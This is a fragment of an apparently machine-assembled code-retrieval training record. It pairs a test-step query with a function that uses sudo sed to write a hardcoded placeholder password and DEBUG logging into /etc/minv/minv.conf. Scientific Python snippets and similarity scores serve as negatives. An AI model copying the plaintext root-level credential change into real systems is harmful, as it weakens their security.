plt.plot(sim_results.data['time'].flatten(), sim_results.data['in'].flatten(), 'b')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['inb_buf'].flatten(), 'g')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['in_buf'].flatten(), 'r')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['midn'].flatten(), 'k')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['midp'].flatten(), 'c')\n plt.plot(sim_results.data['time'].flatten(), sim_results.data['out'].flatten(), 'm')\n plt.legend(['in', 'inb_buf', 'in_buf', 'midn', 'midp', 'out'])\n plt.title(f'pseg_off: {pseg_off}, pseg: {inv_pseg}, nseg: {inv_nseg-pseg_off}, fanout: {fanout}')\n plt.show(block=False)\n '''\n\n # Error checking\n if math.isinf(np.max(tdr_cur)) or math.isinf(np.max(tdf_cur)):\n raise ValueError(\"Got infinite delay!\")\n if np.min(tdr_cur) < 0 or np.min(tdf_cur) < 0:\n raise ValueError(\"Got negative delay.\")\n\n err_cur = np.abs(tdr_cur[0] - tdf_cur[0])\n if err_cur > err_worst:\n err_worst = err_cur\n worst_env = env\n tdr = tdr_cur[0]\n tdf = tdf_cur[0]\n\n '''\n print(f'iter: {inv_pseg}')\n print(f'env: {worst_env}, tdr: {tdr}, tdf: {tdf}')\n breakpoint()\n '''\n\n if tdr < tdf:\n iterator.down(tdr - tdf, False)\n else:\n iterator.up(tdr - tdf, False)\n\n err_abs = np.abs(tdr - tdf)\n if err_abs < err_best:\n err_best = err_abs\n iterator.save_info(pseg_off)\n\n pseg_off = iterator.get_last_save_info()\n pseg_off = 0 if pseg_off is None else pseg_off # Should only hit this case if inv_pseg_nom = 1\n inv_pseg = inv_pseg_nom + pseg_off\n\n return inv_pseg, inv_nseg - 0 * pseg_off", "def calc_T_sys(nu_obs):\n return 100 * u.K + 120 * (nu_obs / (150 * u.MHz))**(-2.55) * u.K", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def test_generate_nb(self):\n pass", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def gen_new_phiw_div_phib_arr(N_PROCESSES, phiw_div_phib_arr_new, cond_GT, fcn_D, fcn_eta, z_div_L_arr, phiw_div_phib_arr, Pi_div_DLP_arr, weight, gp_arr, gm_arr, yt_arr, phi_yt_arr, ID_yt_arr, Ieta_yt_arr):\n phi_b = cond_GT['phi_bulk']\n ed = cond_GT['epsilon_d']\n membrane_geometry = cond_GT['membrane_geometry']\n \n Ny = size(yt_arr)\n # # Python allocate the name for phi_yt_arr[0], this is the same as reference value for C++ \" y= &x\"\n phi_arr_z0 = phi_yt_arr[0]\n Ieta_arr_z0= Ieta_yt_arr[0]\n ID_arr_z0 = ID_yt_arr[0]\n\n ind_z0 = 0 #z-index at inlet\n \n z0_div_L = 0. #z-coord at inlet\n \n r0_div_R = 0. #r-coord at the centerline of pipe\n rw_div_R = 1. #r-coord at the membrane wall\n \n vw_div_vw0_z0 = get_v_conv(rw_div_R, z0_div_L, Pi_div_DLP_arr[ind_z0], cond_GT, gp_arr[ind_z0], gm_arr[ind_z0])\n gen_phi_wrt_yt(z0_div_L, phiw_div_phib_arr[ind_z0]*phi_b, fcn_D, vw_div_vw0_z0, yt_arr, phi_arr_z0, cond_GT)\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, Ieta_arr_z0, fcn_eta, cond_GT)\n Ieta_arr_z0 /= Ieta_arr_z0[-1] # CHECK\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, ID_arr_z0, fcn_D, cond_GT)\n\n uZ_z0 = get_uZ_out(z0_div_L, cond_GT['k'], cond_GT['Bp'], cond_GT['Bm'], gp_arr[ind_z0], gm_arr[ind_z0])\n F2_0 = cal_F2_Z(vw_div_vw0_z0, ed, yt_arr, Ieta_arr_z0, ID_arr_z0, uZ_z0, membrane_geometry)\n\n Nz = size(z_div_L_arr)\n if (N_PROCESSES ==1):\n # when only single-processor is allocated\n for i in range(1, Nz):\n phiw_div_phib_arr_new[i] = process_at_zi(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\n else:\n # this uses multiprocessing packages\n import multiprocessing as mp\n \n pool = mp.Pool(N_PROCESSES)\n args_list = [(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\\\n for i in range(1, Nz)]\n phiw_div_phib_arr_new[1:] = pool.starmap(process_at_zi, args_list)\n pool.close()\n pool.join()\n\n cnt_EXCEED = 0 \n for i,x in enumerate(phiw_div_phib_arr_new):\n\n x = x*cond_GT['phi_bulk']\n if x > cond_GT['phi_freeze']:\n cnt_EXCEED += 1\n phiw_div_phib_arr_new[i] = cond_GT['phi_freeze']/cond_GT['phi_bulk'] # this prevent the accidently beyond the freezing concentration\n if(cnt_EXCEED>0):\n print('Warning: exceed phi_freeze %d times out of %d\\n'%(cnt_EXCEED, cond_GT['Nz']))\n\n FPI_operator(cond_GT['weight'], phiw_div_phib_arr, phiw_div_phib_arr_new, N_skip=1) # phiw(0) must be phib.\n\n return 0", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def solve_LF(self):\n self.u = zeros(self.N)\n self.u[0] = self.u0\n self.u[1] = self.u1\n u = self.u\n f= self.f\n dt = self.dt\n t = self.t\n N = self.N\n for n in xrange(1,N-1):\n u[n+1] = 2*dt*f(u[n],t[n]) + u[n-1]\n #return t,u", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01" ]
[ "0.59679216", "0.5714044", "0.5704294", "0.5693948", "0.56368655", "0.5636519", "0.558531", "0.55831385", "0.5476309", "0.545802", "0.54322004", "0.541791", "0.5415495", "0.5400221", "0.53617483", "0.5336507", "0.5317923", "0.52990615", "0.529753", "0.5280693", "0.52662027", "0.5264906", "0.5263795", "0.5253147", "0.5251066", "0.52509844", "0.5237396", "0.5233447", "0.5223567", "0.5193649", "0.5188838", "0.5186153", "0.51859", "0.517726", "0.5171902", "0.51623124", "0.5161624", "0.5154487", "0.51522976", "0.5149649", "0.51485866", "0.51485515", "0.5146601", "0.5144514", "0.5136285", "0.5135406", "0.51268095", "0.5122866", "0.5113662", "0.5107399", "0.5106667", "0.5103773", "0.51036245", "0.51028526", "0.5100998", "0.50984997", "0.5094762", "0.5094426", "0.50943315", "0.50913864", "0.5086233", "0.50841075", "0.5082773", "0.50778717", "0.50712", "0.5061026", "0.5060182", "0.50566053", "0.504915", "0.50488234", "0.50423837", "0.5040596", "0.50403285", "0.5038737", "0.50373167", "0.5035186", "0.50317836", "0.502707", "0.50253683", "0.5017353", "0.50154227", "0.501487", "0.5013365", "0.5011359", "0.5009293", "0.5003139", "0.500282", "0.500241", "0.49998924", "0.49997497", "0.49892846", "0.49877205", "0.4987132", "0.49857628", "0.49828067", "0.49812287", "0.49776402", "0.49731147", "0.49713686", "0.49708137", "0.49683693" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.3
def config(): sudo( r"sed -i '/#password=/c\password=abcdefghijklmnopq' /etc/minv/minv.conf" ) sudo( r"sed -i '/log_level = INFO/c\log_level = DEBUG' /etc/minv/minv.conf" )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def test_get_nveto_pmts(self):\n pass", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def prove_N() -> Proof:\n # Optional Task 6.8", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_post_nveto_pmts(self):\n pass", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input 